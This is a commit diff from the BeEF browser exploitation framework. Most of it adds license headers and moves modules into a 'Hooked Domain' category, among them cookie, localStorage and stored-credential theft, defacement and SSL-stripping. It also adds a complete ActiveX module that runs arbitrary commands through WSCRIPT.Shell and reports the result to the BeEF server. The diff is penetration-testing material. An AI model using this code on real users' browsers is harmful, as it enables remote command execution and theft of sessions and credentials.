:xssraysscan_id => xssrays_scan.id
)
xssrays_detail.save
end
print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] received ray [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
print_debug("[XSSRAYS] Ray info: \n #{@request.query_string}")
print_debug("[XSSRAYS] Ray info: \n #{request.query_string}")
end
# finalize the XssRays scan marking the scan as finished in the db

4
modules/browser/detect_firebug/command.js
View File

@@ -14,8 +14,8 @@
// limitations under the License.
//
beef.execute(function() {
var result = "Disabled or not installed";
if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled";
var result = "Not in use or not installed";
if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled and in use!";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "firebug="+result);
});

1037
modules/chrome_extensions/get_chrome_extensions/command.js Normal file
View File

File diff suppressed because it is too large Load Diff

26
modules/chrome_extensions/get_chrome_extensions/config.yaml Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
detect_chrome_extensions:
enable: true
category: "Chrome Extensions"
name: "Get Chrome Extensions"
description: "This module detects if any of the top 1,000 Chrome extensions are installed."
authors: ["koto", "bcoles"]
target:
working: ["C"]
not_working: ["All"]

28
modules/chrome_extensions/get_chrome_extensions/module.rb Normal file
View File

@@ -0,0 +1,28 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# More info:
# http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
#
class Detect_chrome_extensions < BeEF::Core::Command
def post_execute
content = {}
content['extension'] = @datastore['extension']
save content
end
end

15
modules/chrome_extensions/inject_beef/command.js
View File

@@ -1,3 +1,18 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook;

15
modules/chrome_extensions/inject_beef/config.yaml
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
inject_beef:

15
modules/chrome_extensions/inject_beef/module.rb
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Inject_beef < BeEF::Core::Command
def post_execute

15
modules/chrome_extensions/send_gvoice_sms/command.js
View File

@@ -1,3 +1,18 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var to = "<%= @to %>";
var message = "<%= @message %>";

15
modules/chrome_extensions/send_gvoice_sms/config.yaml
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
send_gvoice_sms:

15
modules/chrome_extensions/send_gvoice_sms/module.rb
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Send_gvoice_sms < BeEF::Core::Command
def self.options

2
modules/debug/test_network_request/command.js
View File

@@ -25,7 +25,7 @@ beef.execute(function() {
var timeout = "<%= @timeout %>";
var dataType = "<%= @dataType %>";
beef.net.request(scheme, method, domain, port, path, anchor, data, timeout, dataType, function(response) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "response="+JSON.stringify(response)); } );
beef.net.request(scheme, method, domain, port, path, anchor, data, timeout, dataType, function(response) { beef.net.send("<%= @command_url %>", <%= @command_id %>, JSON.stringify(response)); } );
});

34
modules/exploits/activex_command_execution/command.js Executable file
View File

@@ -0,0 +1,34 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var cmd = '<%= @cmd.gsub(/'/, "\\'") %>';
var result = "command was not sent";
try {
var shell = new ActiveXObject('WSCRIPT.Shell').Run(cmd);
if (shell.toString() == 0) {
result = "command sent";
} else {
result = "command failed";
}
} catch(e) {
result = "command failed";
}
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
});

26
modules/exploits/activex_command_execution/config.yaml Executable file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
activex_command_execution:
enable: true
category: "Exploits"
name: "ActiveX Command Execution"
description: "Execute arbitrary commands using the \"WSCRIPT.Shell\" object. The command response is not returned to BeEF.<br><br>The browser must have \"Initialize and script ActiveX controls not marked as safe for scripting\" enabled."
authors: ["bcoles"]
target:
user_notify: ["IE"]
not_working: ["ALL"]

28
modules/exploits/activex_command_execution/module.rb Executable file
View File

@@ -0,0 +1,28 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Activex_command_execution < BeEF::Core::Command
def self.options
return [
{'name' => 'cmd', 'ui_label'=>'Command', 'type' => 'textarea', 'value' =>'cmd.exe /c "echo Hello from BeEF! & pause"', 'width' => '400px', 'height' => '50px'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

0
modules/browser/alert_dialog/command.js → modules/hooked_domain/alert_dialog/command.js
View File

2
modules/browser/alert_dialog/config.yaml → modules/hooked_domain/alert_dialog/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
alert_dialog:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Create Alert Dialog"
description: "Sends an alert dialog to the hooked browser."
authors: ["wade", "bm"]

0
modules/browser/alert_dialog/module.rb → modules/hooked_domain/alert_dialog/module.rb
View File

0
modules/browser/deface_web_page/command.js → modules/hooked_domain/deface_web_page/command.js
View File

2
modules/browser/deface_web_page/config.yaml → modules/hooked_domain/deface_web_page/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
deface_web_page:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Replace Content (Deface)"
description: "Overwrite the body of the page the hooked browser is on with the 'Deface Content' string."
authors: ["antisnatchor"]

0
modules/browser/deface_web_page/module.rb → modules/hooked_domain/deface_web_page/module.rb
View File

0
modules/browser/get_cookie/command.js → modules/hooked_domain/get_cookie/command.js
View File

2
modules/browser/get_cookie/config.yaml → modules/hooked_domain/get_cookie/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_cookie:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Get Cookie"
description: "This module will retrieve the session cookie from the current page."
authors: ["bcoles"]

0
modules/browser/get_cookie/module.rb → modules/hooked_domain/get_cookie/module.rb
View File

0
modules/browser/get_local_storage/command.js → modules/hooked_domain/get_local_storage/command.js
View File

3
modules/browser/get_local_storage/config.yaml → modules/hooked_domain/get_local_storage/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_local_storage:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Get Local Storage"
description: "Extracts data from the HTML5 localStorage object."
authors: ["bcoles"]
@@ -39,4 +39,5 @@ beef:
S:
min_ver: 4
max_ver: latest
not_working: ["ALL"]

0
modules/browser/get_local_storage/module.rb → modules/hooked_domain/get_local_storage/module.rb
View File

0
modules/browser/get_page_html/command.js → modules/hooked_domain/get_page_html/command.js
View File

2
modules/browser/get_page_html/config.yaml → modules/hooked_domain/get_page_html/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_page_html:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Get Page HTML"
description: "This module will retrieve the HTML from the current page."
authors: ["bcoles"]

0
modules/browser/get_page_html/module.rb → modules/hooked_domain/get_page_html/module.rb
View File

0
modules/browser/get_page_links/command.js → modules/hooked_domain/get_page_links/command.js
View File

2
modules/browser/get_page_links/config.yaml → modules/hooked_domain/get_page_links/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_page_links:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Get Page HREFs"
description: "This module will retrieve HREFs from the target page."
authors: ["vo"]

0
modules/browser/get_page_links/module.rb → modules/hooked_domain/get_page_links/module.rb
View File

0
modules/browser/get_session_storage/command.js → modules/hooked_domain/get_session_storage/command.js
View File

3
modules/browser/get_session_storage/config.yaml → modules/hooked_domain/get_session_storage/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_session_storage:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Get Session Storage"
description: "Extracts data from the HTML5 sessionStorage object."
authors: ["bcoles"]
@@ -39,3 +39,4 @@ beef:
S:
min_ver: 4
max_ver: latest
not_working: ["ALL"]

0
modules/browser/get_session_storage/module.rb → modules/hooked_domain/get_session_storage/module.rb
View File

0
modules/browser/get_stored_credentials/command.js → modules/hooked_domain/get_stored_credentials/command.js
View File

2
modules/browser/get_stored_credentials/config.yaml → modules/hooked_domain/get_stored_credentials/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_stored_credentials:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Get Stored Credentials"
description: "This module retrieves saved username/password combinations from the login page on the hooked domain.<br /><br />It will fail if more than one set of domain credentials are saved in the browser."
authors: ["bcoles"]

0
modules/browser/get_stored_credentials/module.rb → modules/hooked_domain/get_stored_credentials/module.rb
View File

0
modules/browser/link_rewrite/command.js → modules/hooked_domain/link_rewrite/command.js
View File

2
modules/browser/link_rewrite/config.yaml → modules/hooked_domain/link_rewrite/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
link_rewrite:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Replace HREFs"
description: "This module will rewrite all the href attributes of all matched links."
authors: ["passbe"]

0
modules/browser/link_rewrite/module.rb → modules/hooked_domain/link_rewrite/module.rb
View File

0
modules/browser/link_rewrite_sslstrip/command.js → modules/hooked_domain/link_rewrite_sslstrip/command.js
View File

2
modules/browser/link_rewrite_sslstrip/config.yaml → modules/hooked_domain/link_rewrite_sslstrip/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
link_rewrite_sslstrip:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Replace HREFs (HTTPS)"
description: "This module will rewrite all the href attributes of HTTPS links to use HTTP instead of HTTPS. Links relative to the web root are not rewritten."
authors: ["bcoles"]

0
modules/browser/link_rewrite_sslstrip/module.rb → modules/hooked_domain/link_rewrite_sslstrip/module.rb
View File

0
modules/browser/prompt_dialog/command.js → modules/hooked_domain/prompt_dialog/command.js
View File

2
modules/browser/prompt_dialog/config.yaml → modules/hooked_domain/prompt_dialog/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
prompt_dialog:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Create Prompt Dialog"
description: "Sends a prompt dialog to the hooked browser."
authors: ["wade", "bm"]

0
modules/browser/prompt_dialog/module.rb → modules/hooked_domain/prompt_dialog/module.rb
View File

0
modules/browser/replace_video/command.js → modules/hooked_domain/replace_video/command.js
View File

2
modules/browser/replace_video/config.yaml → modules/hooked_domain/replace_video/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
replace_video:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Replace Videos"
description: "Replaces an object selected with jQuery (all embed tags by default) with an embed tag containing the youtube video of your choice (rickroll by default)."
authors: ["Yori Kvitchko", "antisnatchor"]

0
modules/browser/replace_video/module.rb → modules/hooked_domain/replace_video/module.rb
View File

0
modules/browser/rickroll/command.js → modules/hooked_domain/rickroll/command.js
View File

2
modules/browser/rickroll/config.yaml → modules/hooked_domain/rickroll/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
rickroll:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Redirect Browser (Rickroll)"
description: "Overwrite the body of the page the victim is on with a full screen Rickroll."
authors: ["Yori Kvitchko"]

0
modules/browser/rickroll/module.rb → modules/hooked_domain/rickroll/module.rb
View File

0
modules/browser/site_redirect/command.js → modules/hooked_domain/site_redirect/command.js
View File

2
modules/browser/site_redirect/config.yaml → modules/hooked_domain/site_redirect/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
site_redirect:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Redirect Browser"
description: "This module will redirect the selected hooked browser to the address specified in the 'Redirect URL' input."
authors: ["wade", "vo"]

0
modules/browser/site_redirect/module.rb → modules/hooked_domain/site_redirect/module.rb
View File

0
modules/browser/site_redirect_iframe/command.js → modules/hooked_domain/site_redirect_iframe/command.js
View File

2
modules/browser/site_redirect_iframe/config.yaml → modules/hooked_domain/site_redirect_iframe/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
site_redirect_iframe:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Redirect Browser (iFrame)"
description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title and the time delay are specified in the parameters below.<br><br>The content of the URL bar will not be changed in the hooked browser."
authors: ["ethicalhack3r", "Yori Kvitchko"]

0
modules/browser/site_redirect_iframe/module.rb → modules/hooked_domain/site_redirect_iframe/module.rb
View File

16
modules/host/detect_software/command.js
View File

@@ -1,5 +1,17 @@
//
// detect software
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {

Some files were not shown because too many files have changed in this diff Show More